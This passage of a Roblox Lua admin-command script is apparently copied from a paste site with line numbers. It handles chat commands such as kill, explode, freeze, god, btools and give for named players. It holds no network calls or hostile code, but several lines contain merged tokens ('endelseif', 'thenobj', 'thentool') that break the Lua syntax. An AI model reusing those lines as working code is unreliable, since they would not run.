  1445. 723.UnsheathSound:play()
  1446.  
  1447. 724.script.Parent.Enabled = true
  1448.  
  1449. 725.if not mouse then return end
  1450.  
  1451. 726.mouse.Icon = "http://www.roblox.com/asset/?id=103593352"
  1452.  
  1453. 727.end)]] cl.Disabled = false
  1454.  
  1455. 728.end
  1456.  
  1457. 729.end))
  1458.  
  1459. 730.end
  1460.  
  1461. 731.end
  1462.  
  1463. 732.
  1464.  
  1465. 733.if msg:lower():sub(1,5) == "kill " then
  1466.  
  1467. 734.local plrz = GetPlr(plr, msg:lower():sub(6))
  1468.  
  1469. 735.for i, v in pairs(plrz) do
  1470.  
  1471. 736.coroutine.resume(coroutine.create(function()
  1472.  
  1473. 737.if v and v.Character then v.Character:BreakJoints() end
  1474.  
  1475. 738.end))
  1476.  
  1477. 739.end
  1478.  
  1479. 740.end
  1480.  
  1481. 741.
  1482.  
  1483. 742.if msg:lower():sub(1,8) == "respawn " then
  1484.  
  1485. 743.local plrz = GetPlr(plr, msg:lower():sub(9))
  1486.  
  1487. 744.for i, v in pairs(plrz) do
  1488.  
  1489. 745.coroutine.resume(coroutine.create(function()
  1490.  
  1491. 746.if v and v.Character then v:LoadCharacter() end
  1492.  
  1493. 747.end))
  1494.  
  1495. 748.end
  1496.  
  1497. 749.end
  1498.  
  1499. 750.
  1500.  
  1501. 751.if msg:lower():sub(1,5) == "trip " then
  1502.  
  1503. 752.local plrz = GetPlr(plr, msg:lower():sub(6))
  1504.  
  1505. 753.for i, v in pairs(plrz) do
  1506.  
  1507. 754.coroutine.resume(coroutine.create(function()
  1508.  
  1509. 755.if v and v.Character and v.Character:findFirstChild("Torso") then
  1510.  
  1511. 756.v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1512.  
  1513. 757.end
  1514.  
  1515. 758.end))
  1516.  
  1517. 759.end
  1518.  
  1519. 760.end
  1520.  
  1521. 761.
  1522.  
  1523. 762.if msg:lower():sub(1,5) == "stun " then
  1524.  
  1525. 763.local plrz = GetPlr(plr, msg:lower():sub(6))
  1526.  
  1527. 764.for i, v in pairs(plrz) do
  1528.  
  1529. 765.coroutine.resume(coroutine.create(function()
  1530.  
  1531. 766.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1532.  
  1533. 767.v.Character.Humanoid.PlatformStand = true
  1534.  
  1535. 768.end
  1536.  
  1537. 769.end))
  1538.  
  1539. 770.end
  1540.  
  1541. 771.end
  1542.  
  1543. 772.
  1544.  
  1545. 773.if msg:lower():sub(1,7) == "unstun " then
  1546.  
  1547. 774.local plrz = GetPlr(plr, msg:lower():sub(8))
  1548.  
  1549. 775.for i, v in pairs(plrz) do
  1550.  
  1551. 776.coroutine.resume(coroutine.create(function()
  1552.  
  1553. 777.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1554.  
  1555. 778.v.Character.Humanoid.PlatformStand = false
  1556.  
  1557. 779.end
  1558.  
  1559. 780.end))
  1560.  
  1561. 781.end
  1562.  
  1563. 782.end
  1564.  
  1565. 783.
  1566.  
  1567. 784.if msg:lower():sub(1,5) == "jump " then
  1568.  
  1569. 785.local plrz = GetPlr(plr, msg:lower():sub(6))
  1570.  
  1571. 786.for i, v in pairs(plrz) do
  1572.  
  1573. 787.coroutine.resume(coroutine.create(function()
  1574.  
  1575. 788.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1576.  
  1577. 789.v.Character.Humanoid.Jump = true
  1578.  
  1579. 790.end
  1580.  
  1581. 791.end))
  1582.  
  1583. 792.end
  1584.  
  1585. 793.end
  1586.  
  1587. 794.
  1588.  
  1589. 795.if msg:lower():sub(1,4) == "sit " then
  1590.  
  1591. 796.local plrz = GetPlr(plr, msg:lower():sub(5))
  1592.  
  1593. 797.for i, v in pairs(plrz) do
  1594.  
  1595. 798.coroutine.resume(coroutine.create(function()
  1596.  
  1597. 799.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1598.  
  1599. 800.v.Character.Humanoid.Sit = true
  1600.  
  1601. 801.end
  1602.  
  1603. 802.end))
  1604.  
  1605. 803.end
  1606.  
  1607. 804.end
  1608.  
  1609. 805.
  1610.  
  1611. 806.if msg:lower():sub(1,10) == "invisible " then
  1612.  
  1613. 807.local plrz = GetPlr(plr, msg:lower():sub(11))
  1614.  
  1615. 808.for i, v in pairs(plrz) do
  1616.  
  1617. 809.coroutine.resume(coroutine.create(function()
  1618.  
  1619. 810.if v and v.Character then
  1620.  
  1621. 811.for a, obj in pairs(v.Character:children()) do
  1622.  
  1623. 812.if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 endelseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1624.  
  1625. 813.end
  1626.  
  1627. 814.end
  1628.  
  1629. 815.end))
  1630.  
  1631. 816.end
  1632.  
  1633. 817.end
  1634.  
  1635. 818.
  1636.  
  1637. 819.if msg:lower():sub(1,8) == "visible " then
  1638.  
  1639. 820.local plrz = GetPlr(plr, msg:lower():sub(9))
  1640.  
  1641. 821.for i, v in pairs(plrz) do
  1642.  
  1643. 822.coroutine.resume(coroutine.create(function()
  1644.  
  1645. 823.if v and v.Character then
  1646.  
  1647. 824.for a, obj in pairs(v.Character:children()) do
  1648.  
  1649. 825.if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 endelseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1650.  
  1651. 826.end
  1652.  
  1653. 827.end
  1654.  
  1655. 828.end))
  1656.  
  1657. 829.end
  1658.  
  1659. 830.end
  1660.  
  1661. 831.
  1662.  
  1663. 832.if msg:lower():sub(1,5) == "lock " then
  1664.  
  1665. 833.local plrz = GetPlr(plr, msg:lower():sub(6))
  1666.  
  1667. 834.for i, v in pairs(plrz) do
  1668.  
  1669. 835.coroutine.resume(coroutine.create(function()
  1670.  
  1671. 836.if v and v.Character then
  1672.  
  1673. 837.for a, obj in pairs(v.Character:children()) do
  1674.  
  1675. 838.if obj:IsA("BasePart") then obj.Locked = true elseif obj:IsA("Hat") and obj:findFirstChild("Handle") thenobj.Handle.Locked = true end
  1676.  
  1677. 839.end
  1678.  
  1679. 840.end
  1680.  
  1681. 841.end))
  1682.  
  1683. 842.end
  1684.  
  1685. 843.end
  1686.  
  1687. 844.
  1688.  
  1689. 845.if msg:lower():sub(1,7) == "unlock " then
  1690.  
  1691. 846.local plrz = GetPlr(plr, msg:lower():sub(8))
  1692.  
  1693. 847.for i, v in pairs(plrz) do
  1694.  
  1695. 848.coroutine.resume(coroutine.create(function()
  1696.  
  1697. 849.if v and v.Character then
  1698.  
  1699. 850.for a, obj in pairs(v.Character:children()) do
  1700.  
  1701. 851.if obj:IsA("BasePart") then obj.Locked = false elseif obj:IsA("Hat") and obj:findFirstChild("Handle") thenobj.Handle.Locked = false end
  1702.  
  1703. 852.end
  1704.  
  1705. 853.end
  1706.  
  1707. 854.end))
  1708.  
  1709. 855.end
  1710.  
  1711. 856.end
  1712.  
  1713. 857.
  1714.  
  1715. 858.if msg:lower():sub(1,8) == "explode " then
  1716.  
  1717. 859.local plrz = GetPlr(plr, msg:lower():sub(9))
  1718.  
  1719. 860.for i, v in pairs(plrz) do
  1720.  
  1721. 861.coroutine.resume(coroutine.create(function()
  1722.  
  1723. 862.if v and v.Character and v.Character:findFirstChild("Torso") then
  1724.  
  1725. 863.local ex = Instance.new("Explosion", game.Workspace) ex.Position = v.Character.Torso.Position
  1726.  
  1727. 864.end
  1728.  
  1729. 865.end))
  1730.  
  1731. 866.end
  1732.  
  1733. 867.end
  1734.  
  1735. 868.
  1736.  
  1737. 869.if msg:lower():sub(1,4) == "age " then
  1738.  
  1739. 870.local plrz = GetPlr(plr, msg:lower():sub(5))
  1740.  
  1741. 871.for i, v in pairs(plrz) do
  1742.  
  1743. 872.coroutine.resume(coroutine.create(function()
  1744.  
  1745. 873.if v then Message(v.Name .. "'s age", tostring(v.AccountAge), false, {plr}) end
  1746.  
  1747. 874.end))
  1748.  
  1749. 875.end
  1750.  
  1751. 876.end
  1752.  
  1753. 877.
  1754.  
  1755. 878.if msg:lower():sub(1,5) == "fire " then
  1756.  
  1757. 879.local plrz = GetPlr(plr, msg:lower():sub(6))
  1758.  
  1759. 880.for i, v in pairs(plrz) do
  1760.  
  1761. 881.coroutine.resume(coroutine.create(function()
  1762.  
  1763. 882.if v and v.Character and v.Character:findFirstChild("Torso") then
  1764.  
  1765. 883.local cl = Instance.new("Fire", v.Character.Torso) table.insert(objects, cl)
  1766.  
  1767. 884.end
  1768.  
  1769. 885.end))
  1770.  
  1771. 886.end
  1772.  
  1773. 887.end
  1774.  
  1775. 888.
  1776.  
  1777. 889.if msg:lower():sub(1,7) == "unfire " then
  1778.  
  1779. 890.local plrz = GetPlr(plr, msg:lower():sub(8))
  1780.  
  1781. 891.for i, v in pairs(plrz) do
  1782.  
  1783. 892.coroutine.resume(coroutine.create(function()
  1784.  
  1785. 893.if v and v.Character and v.Character:findFirstChild("Torso") then
  1786.  
  1787. 894.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1788.  
  1789. 895.end
  1790.  
  1791. 896.end))
  1792.  
  1793. 897.end
  1794.  
  1795. 898.end
  1796.  
  1797. 899.
  1798.  
  1799. 900.if msg:lower():sub(1,6) == "smoke " then
  1800.  
  1801. 901.local plrz = GetPlr(plr, msg:lower():sub(7))
  1802.  
  1803. 902.for i, v in pairs(plrz) do
  1804.  
  1805. 903.coroutine.resume(coroutine.create(function()
  1806.  
  1807. 904.if v and v.Character and v.Character:findFirstChild("Torso") then
  1808.  
  1809. 905.local cl = Instance.new("Smoke", v.Character.Torso) table.insert(objects, cl)
  1810.  
  1811. 906.end
  1812.  
  1813. 907.end))
  1814.  
  1815. 908.end
  1816.  
  1817. 909.end
  1818.  
  1819. 910.
  1820.  
  1821. 911.if msg:lower():sub(1,8) == "unsmoke " then
  1822.  
  1823. 912.local plrz = GetPlr(plr, msg:lower():sub(9))
  1824.  
  1825. 913.for i, v in pairs(plrz) do
  1826.  
  1827. 914.coroutine.resume(coroutine.create(function()
  1828.  
  1829. 915.if v and v.Character and v.Character:findFirstChild("Torso") then
  1830.  
  1831. 916.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1832.  
  1833. 917.end
  1834.  
  1835. 918.end))
  1836.  
  1837. 919.end
  1838.  
  1839. 920.end
  1840.  
  1841. 921.
  1842.  
  1843. 922.if msg:lower():sub(1,9) == "sparkles " then
  1844.  
  1845. 923.local plrz = GetPlr(plr, msg:lower():sub(10))
  1846.  
  1847. 924.for i, v in pairs(plrz) do
  1848.  
  1849. 925.coroutine.resume(coroutine.create(function()
  1850.  
  1851. 926.if v and v.Character and v.Character:findFirstChild("Torso") then
  1852.  
  1853. 927.local cl = Instance.new("Sparkles", v.Character.Torso) table.insert(objects, cl)
  1854.  
  1855. 928.end
  1856.  
  1857. 929.end))
  1858.  
  1859. 930.end
  1860.  
  1861. 931.end
  1862.  
  1863. 932.
  1864.  
  1865. 933.if msg:lower():sub(1,11) == "unsparkles " then
  1866.  
  1867. 934.local plrz = GetPlr(plr, msg:lower():sub(12))
  1868.  
  1869. 935.for i, v in pairs(plrz) do
  1870.  
  1871. 936.coroutine.resume(coroutine.create(function()
  1872.  
  1873. 937.if v and v.Character and v.Character:findFirstChild("Torso") then
  1874.  
  1875. 938.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1876.  
  1877. 939.end
  1878.  
  1879. 940.end))
  1880.  
  1881. 941.end
  1882.  
  1883. 942.end
  1884.  
  1885. 943.
  1886.  
  1887. 944.if msg:lower():sub(1,3) == "ff " then
  1888.  
  1889. 945.local plrz = GetPlr(plr, msg:lower():sub(4))
  1890.  
  1891. 946.for i, v in pairs(plrz) do
  1892.  
  1893. 947.coroutine.resume(coroutine.create(function()
  1894.  
  1895. 948.if v and v.Character then Instance.new("ForceField", v.Character) end
  1896.  
  1897. 949.end))
  1898.  
  1899. 950.end
  1900.  
  1901. 951.end
  1902.  
  1903. 952.
  1904.  
  1905. 953.if msg:lower():sub(1,5) == "unff " then
  1906.  
  1907. 954.local plrz = GetPlr(plr, msg:lower():sub(6))
  1908.  
  1909. 955.for i, v in pairs(plrz) do
  1910.  
  1911. 956.coroutine.resume(coroutine.create(function()
  1912.  
  1913. 957.if v and v.Character then
  1914.  
  1915. 958.for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1916.  
  1917. 959.end
  1918.  
  1919. 960.end))
  1920.  
  1921. 961.end
  1922.  
  1923. 962.end
  1924.  
  1925. 963.
  1926.  
  1927. 964.if msg:lower():sub(1,7) == "punish " then
  1928.  
  1929. 965.local plrz = GetPlr(plr, msg:lower():sub(8))
  1930.  
  1931. 966.for i, v in pairs(plrz) do
  1932.  
  1933. 967.coroutine.resume(coroutine.create(function()
  1934.  
  1935. 968.if v and v.Character then
  1936.  
  1937. 969.v.Character.Parent = game:service("Lighting")
  1938.  
  1939. 970.end
  1940.  
  1941. 971.end))
  1942.  
  1943. 972.end
  1944.  
  1945. 973.end
  1946.  
  1947. 974.
  1948.  
  1949. 975.if msg:lower():sub(1,9) == "unpunish " then
  1950.  
  1951. 976.local plrz = GetPlr(plr, msg:lower():sub(10))
  1952.  
  1953. 977.for i, v in pairs(plrz) do
  1954.  
  1955. 978.coroutine.resume(coroutine.create(function()
  1956.  
  1957. 979.if v and v.Character then
  1958.  
  1959. 980.v.Character.Parent = game:service("Workspace")
  1960.  
  1961. 981.v.Character:MakeJoints()
  1962.  
  1963. 982.end
  1964.  
  1965. 983.end))
  1966.  
  1967. 984.end
  1968.  
  1969. 985.end
  1970.  
  1971. 986.
  1972.  
  1973. 987.if msg:lower():sub(1,7) == "freeze " then
  1974.  
  1975. 988.local plrz = GetPlr(plr, msg:lower():sub(8))
  1976.  
  1977. 989.for i, v in pairs(plrz) do
  1978.  
  1979. 990.coroutine.resume(coroutine.create(function()
  1980.  
  1981. 991.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1982.  
  1983. 992.for a, obj in pairs(v.Character:children()) do
  1984.  
  1985. 993.if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1986.  
  1987. 994.end
  1988.  
  1989. 995.end
  1990.  
  1991. 996.end))
  1992.  
  1993. 997.end
  1994.  
  1995. 998.end
  1996.  
  1997. 999.
  1998.  
  1999. 1000.if msg:lower():sub(1,5) == "thaw " then
  2000.  
  2001. 1001.local plrz = GetPlr(plr, msg:lower():sub(6))
  2002.  
  2003. 1002.for i, v in pairs(plrz) do
  2004.  
  2005. 1003.coroutine.resume(coroutine.create(function()
  2006.  
  2007. 1004.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2008.  
  2009. 1005.for a, obj in pairs(v.Character:children()) do
  2010.  
  2011. 1006.if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  2012.  
  2013. 1007.end
  2014.  
  2015. 1008.end
  2016.  
  2017. 1009.end))
  2018.  
  2019. 1010.end
  2020.  
  2021. 1011.end
  2022.  
  2023. 1012.
  2024.  
  2025. 1013.if msg:lower():sub(1,5) == "heal " then
  2026.  
  2027. 1014.local plrz = GetPlr(plr, msg:lower():sub(6))
  2028.  
  2029. 1015.for i, v in pairs(plrz) do
  2030.  
  2031. 1016.coroutine.resume(coroutine.create(function()
  2032.  
  2033. 1017.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2034.  
  2035. 1018.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  2036.  
  2037. 1019.end
  2038.  
  2039. 1020.end))
  2040.  
  2041. 1021.end
  2042.  
  2043. 1022.end
  2044.  
  2045. 1023.
  2046.  
  2047. 1024.if msg:lower():sub(1,4) == "god " then
  2048.  
  2049. 1025.local plrz = GetPlr(plr, msg:lower():sub(5))
  2050.  
  2051. 1026.for i, v in pairs(plrz) do
  2052.  
  2053. 1027.coroutine.resume(coroutine.create(function()
  2054.  
  2055. 1028.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2056.  
  2057. 1029.v.Character.Humanoid.MaxHealth = math.huge
  2058.  
  2059. 1030.v.Character.Humanoid.Health = 9e9
  2060.  
  2061. 1031.end
  2062.  
  2063. 1032.end))
  2064.  
  2065. 1033.end
  2066.  
  2067. 1034.end
  2068.  
  2069. 1035.
  2070.  
  2071. 1036.if msg:lower():sub(1,6) == "ungod " then
  2072.  
  2073. 1037.local plrz = GetPlr(plr, msg:lower():sub(7))
  2074.  
  2075. 1038.for i, v in pairs(plrz) do
  2076.  
  2077. 1039.coroutine.resume(coroutine.create(function()
  2078.  
  2079. 1040.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2080.  
  2081. 1041.v.Character.Humanoid.MaxHealth = 100
  2082.  
  2083. 1042.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  2084.  
  2085. 1043.end
  2086.  
  2087. 1044.end))
  2088.  
  2089. 1045.end
  2090.  
  2091. 1046.end
  2092.  
  2093. 1047.
  2094.  
  2095. 1048.if msg:lower():sub(1,8) == "ambient " then
  2096.  
  2097. 1049.local chk1 = msg:lower():sub(9):find(" ") + 8
  2098.  
  2099. 1050.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  2100.  
  2101. 1051.game.Lighting.Ambient = Color3.new(msg:sub(9,chk1-1),msg:sub(chk1+1,chk2-1),msg:sub(chk2+1))
  2102.  
  2103. 1052.end
  2104.  
  2105. 1053.
  2106.  
  2107. 1054.if msg:lower():sub(1,11) == "brightness " then
  2108.  
  2109. 1055.game.Lighting.Brightness = msg:sub(12)
  2110.  
  2111. 1056.end
  2112.  
  2113. 1057.
  2114.  
  2115. 1058.if msg:lower():sub(1,5) == "time " then
  2116.  
  2117. 1059.game.Lighting.TimeOfDay = msg:sub(6)
  2118.  
  2119. 1060.end
  2120.  
  2121. 1061.
  2122.  
  2123. 1062.if msg:lower():sub(1,9) == "fogcolor " then
  2124.  
  2125. 1063.local chk1 = msg:lower():sub(10):find(" ") + 9
  2126.  
  2127. 1064.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  2128.  
  2129. 1065.game.Lighting.FogColor = Color3.new(msg:sub(10,chk1-1),msg:sub(chk1+1,chk2-1),msg:sub(chk2+1))
  2130.  
  2131. 1066.end
  2132.  
  2133. 1067.
  2134.  
  2135. 1068.if msg:lower():sub(1,7) == "fogend " then
  2136.  
  2137. 1069.game.Lighting.FogEnd = msg:sub(8)
  2138.  
  2139. 1070.end
  2140.  
  2141. 1071.
  2142.  
  2143. 1072.if msg:lower():sub(1,9) == "fogstart " then
  2144.  
  2145. 1073.game.Lighting.FogStart = msg:sub(10)
  2146.  
  2147. 1074.end
  2148.  
  2149. 1075.
  2150.  
  2151. 1076.if msg:lower():sub(1,7) == "btools " then
  2152.  
  2153. 1077.local plrz = GetPlr(plr, msg:lower():sub(8))
  2154.  
  2155. 1078.for i, v in pairs(plrz) do
  2156.  
  2157. 1079.coroutine.resume(coroutine.create(function()
  2158.  
  2159. 1080.if v and v:findFirstChild("Backpack") then
  2160.  
  2161. 1081.local t1 = Instance.new("HopperBin", v.Backpack) t1.Name = "Move" t1.BinType = "GameTool"
  2162.  
  2163. 1082.local t2 = Instance.new("HopperBin", v.Backpack) t2.Name = "Clone" t2.BinType = "Clone"
  2164.  
  2165. 1083.local t3 = Instance.new("HopperBin", v.Backpack) t3.Name = "Delete" t3.BinType = "Hammer"
  2166.  
  2167. 1084.local t4= Instance.new("HopperBin", v.Backpack) t4.Name = "Resize"
  2168.  
  2169. 1085.local cl4 = script.LocalScriptBase:Clone() cl4.Parent = t4 cl4.Code.Value = [[
  2170.  
  2171. 1086.repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer:findFirstChild("PlayerGui")
  2172.  
  2173. 1087.local sb
  2174.  
  2175. 1088.local hs
  2176.  
  2177. 1089.local pdist
  2178.  
  2179. 1090.
  2180.  
  2181. 1091.script.Parent.Selected:connect(function(mouse)
  2182.  
  2183. 1092.if not mouse then return end
  2184.  
  2185. 1093.sb = Instance.new("SelectionBox", game.Players.LocalPlayer.PlayerGui) sb.Color = BrickColor.new("Bright blue") sb.Adornee = nil
  2186.  
  2187. 1094.hs = Instance.new("Handles", game.Players.LocalPlayer.PlayerGui) hs.Color = BrickColor.new("Bright blue") hs.Adornee = nil
  2188.  
  2189. 1095.mouse.Button1Down:connect(function() if not mouse.Target or mouse.Target.Locked then sb.Adornee = nil hs.Adornee = nil else sb.Adornee = mouse.Target hs.Adornee = mouse.Target hs.Faces = mouse.Target.ResizeableFaces end end)
  2190.  
  2191. 1096.hs.MouseDrag:connect(function(old,dist) if hs.Adornee and math.abs(dist-pdist) >= hs.Adornee.ResizeIncrement then if hs.Adornee:Resize(old, math.floor((dist-pdist)/ hs.Adornee.ResizeIncrement + .5) * hs.Adornee.ResizeIncrement) then pdist = dist end end end)
  2192.  
  2193. 1097.hs.MouseButton1Down:connect(function() pdist = 0 end)
  2194.  
  2195. 1098.end)
  2196.  
  2197. 1099.
  2198.  
  2199. 1100.script.Parent.Deselected:connect(function() sb:Destroy() hs:Destroy() end)]] cl4.Disabled = false
  2200.  
  2201. 1101.end
  2202.  
  2203. 1102.end))
  2204.  
  2205. 1103.end
  2206.  
  2207. 1104.end
  2208.  
  2209. 1105.
  2210.  
  2211. 1106.if msg:lower():sub(1,5) == "give " then
  2212.  
  2213. 1107.local chk1 = msg:lower():sub(6):find(" ") + 5
  2214.  
  2215. 1108.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  2216.  
  2217. 1109.for i, v in pairs(plrz) do
  2218.  
  2219. 1110.coroutine.resume(coroutine.create(function()
  2220.  
  2221. 1111.if v and v:findFirstChild("Backpack") and game:findFirstChild("Lighting") then
  2222.  
  2223. 1112.for a, tool in pairs(game.Lighting:children()) do
  2224.  
  2225. 1113.if tool:IsA("Tool") or tool:IsA("HopperBin") then
  2226.  
  2227. 1114.if msg:lower():sub(chk1+1) == "all" or tool.Name:lower():find(msg:lower():sub(chk1+1)) == 1 thentool:Clone().Parent = v.Backpack end
  2228.  
  2229. 1115.end
  2230.  
  2231. 1116.end
  2232.  
  2233. 1117.end
  2234.  
  2235. 1118.end))
  2236.  
  2237. 1119.end
  2238.  
  2239. 1120.end
  2240.  
  2241. 1121.
  2242.  
  2243. 1122.if msg:lower():sub(1,12) == "removetools " then
  2244.  
  2245. 1123.local plrz = GetPlr(plr, msg:lower():sub(13))
  2246.  
  2247. 1124.for i, v in pairs(plrz) do
  2248.  
  2249. 1125.coroutine.resume(coroutine.create(function()
  2250.  
  2251. 1126.if v and v.Character and v:findFirstChild("Backpack") then
  2252.  
  2253. 1127.for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy()end end
  2254.  
  2255. 1128.for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy()end end
  2256.  
  2257. 1129.end
  2258.  
  2259. 1130.end))
  2260.  
  2261. 1131.end
  2262.  
  2263. 1132.end
  2264.  
  2265. 1133.
  2266.  
  2267. 1134.if msg:lower():sub(1,5) == "rank " then
  2268.  
  2269. 1135.local chk1 = msg:lower():sub(6):find(" ") + 5
  2270.  
  2271. 1136.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  2272.  
  2273. 1137.for i, v in pairs(plrz) do
  2274.  
  2275. 1138.coroutine.resume(coroutine.create(function()
  2276.  
  2277. 1139.if v and v:IsInGroup(msg:sub(chk1+1)) then
  2278.  
  2279. 1140.Hint("[" .. v:GetRankInGroup(msg:sub(chk1+1)) .. "] " .. v:GetRoleInGroup(msg:sub(chk1+1)), {plr})
  2280.  
  2281. 1141.elseif v and not v:IsInGroup(msg:sub(chk1+1))then
  2282.  
  2283. 1142.Hint(v.Name .. " is not in the group " .. msg:sub(chk1+1), {plr})
  2284.  
  2285. 1143.end
  2286.  
  2287. 1144.end))
  2288.  
  2289. 1145.end
  2290.  
  2291. 1146.end
  2292.  
  2293. 1147.
  2294.  
  2295. 1148.if msg:lower():sub(1,7) == "damage " then
  2296.  
  2297. 1149.local chk1 = msg:lower():sub(8):find(" ") + 7
  2298.  
  2299. 1150.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  2300.  
  2301. 1151.for i, v in pairs(plrz) do
  2302.  
  2303. 1152.coroutine.resume(coroutine.create(function()
  2304.  
  2305. 1153.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2306.  
  2307. 1154.v.Character.Humanoid:TakeDamage(msg:sub(chk1+1))
  2308.  
  2309. 1155.end
  2310.  
  2311. 1156.end))
  2312.  
  2313. 1157.end
  2314.  
  2315. 1158.end
  2316.  
  2317. 1159.
  2318.  
  2319. 1160.if msg:lower():sub(1,5) == "grav " then
  2320.  
  2321. 1161.local plrz = GetPlr(plr, msg:lower():sub(6))
  2322.  
  2323. 1162.for i, v in pairs(plrz) do
  2324.  
  2325. 1163.coroutine.resume(coroutine.create(function()
  2326.  
  2327. 1164.if v and v.Character and v.Character:findFirstChild("Torso") then
  2328.  
  2329. 1165.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  2330.  
  2331. 1166.end
  2332.  
  2333. 1167.end))
  2334.  
  2335. 1168.end
  2336.  
  2337. 1169.end
  2338.  
  2339. 1170.
  2340.  
  2341. 1171.if msg:lower():sub(1,8) == "setgrav " then
  2342.  
  2343. 1172.local chk1 = msg:lower():sub(9):find(" ") + 8
  2344.  
  2345. 1173.local plrz = GetPlr(plr, msg:lower():sub(9,chk1-1))
  2346.  
  2347. 1174.for i, v in pairs(plrz) do
  2348.  
  2349. 1175.coroutine.resume(coroutine.create(function()
  2350.  
  2351. 1176.if v and v.Character and v.Character:findFirstChild("Torso") then
  2352.  
  2353. 1177.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  2354.  
  2355. 1178.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(0,0,0)
  2356.  
  2357. 1179.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") then frc.force = frc.force -Vector3.new(0,prt:GetMass()*msg:sub(chk1+1),0) elseif prt:IsA("Hat") then frc.force = frc.force -Vector3.new(0,prt.Handle:GetMass()*msg:sub(chk1+1),0) end end
  2358.  
  2359. 1180.end
  2360.  
  2361. 1181.end))
  2362.  
  2363. 1182.end
  2364.  
  2365. 1183.end
  2366.  
  2367. 1184.
  2368.  
  2369. 1185.if msg:lower():sub(1,7) == "nograv " then
  2370.  
  2371. 1186.local plrz = GetPlr(plr, msg:lower():sub(8))
  2372.  
  2373. 1187.for i, v in pairs(plrz) do
  2374.  
  2375. 1188.coroutine.resume(coroutine.create(function()
  2376.  
  2377. 1189.if v and v.Character and v.Character:findFirstChild("Torso") then
  2378.  
  2379. 1190.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  2380.  
  2381. 1191.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(0,0,0)
  2382.  
  2383. 1192.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") then frc.force = frc.force +Vector3.new(0,prt:GetMass()*196.25,0) elseif prt:IsA("Hat") then frc.force = frc.force +Vector3.new(0,prt.Handle:GetMass()*196.25,0) end end
  2384.  
  2385. 1193.end
  2386.  
  2387. 1194.end))
  2388.  
  2389. 1195.end
  2390.  
  2391. 1196.end
  2392.  
  2393. 1197.
  2394.  
  2395. 1198.if msg:lower():sub(1,7) == "health " then
  2396.  
  2397. 1199.local chk1 = msg:lower():sub(8):find(" ") + 7
  2398.  
  2399. 1200.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  2400.  
  2401. 1201.for i, v in pairs(plrz) do
  2402.  
  2403. 1202.coroutine.resume(coroutine.create(function()
  2404.  
  2405. 1203.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2406.  
  2407. 1204.v.Character.Humanoid.MaxHealth = msg:sub(chk1+1)
  2408.  
  2409. 1205.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  2410.  
  2411. 1206.end
  2412.  
  2413. 1207.end))
  2414.  
  2415. 1208.end
  2416.  
  2417. 1209.end
  2418.  
  2419. 1210.
  2420.  
  2421. 1211.if msg:lower():sub(1,6) == "speed " then
  2422.  
  2423. 1212.local chk1 = msg:lower():sub(7):find(" ") + 6
  2424.  
  2425. 1213.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  2426.  
  2427. 1214.for i, v in pairs(plrz) do
  2428.  
  2429. 1215.coroutine.resume(coroutine.create(function()
  2430.  
  2431. 1216.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2432.  
  2433. 1217.v.Character.Humanoid.WalkSpeed = msg:sub(chk1+1)
  2434.  
  2435. 1218.end
  2436.  
  2437. 1219.end))
  2438.  
  2439. 1220.end
  2440.  
  2441. 1221.end
  2442.  
  2443. 1222.
  2444.  
  2445. 1223.if msg:lower():sub(1,5) == "team " then
  2446.  
  2447. 1224.local chk1 = msg:lower():sub(6):find(" ") + 5
  2448.  
  2449. 1225.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  2450.  
  2451. 1226.for i, v in pairs(plrz) do
  2452.  
  2453. 1227.coroutine.resume(coroutine.create(function()
  2454.  
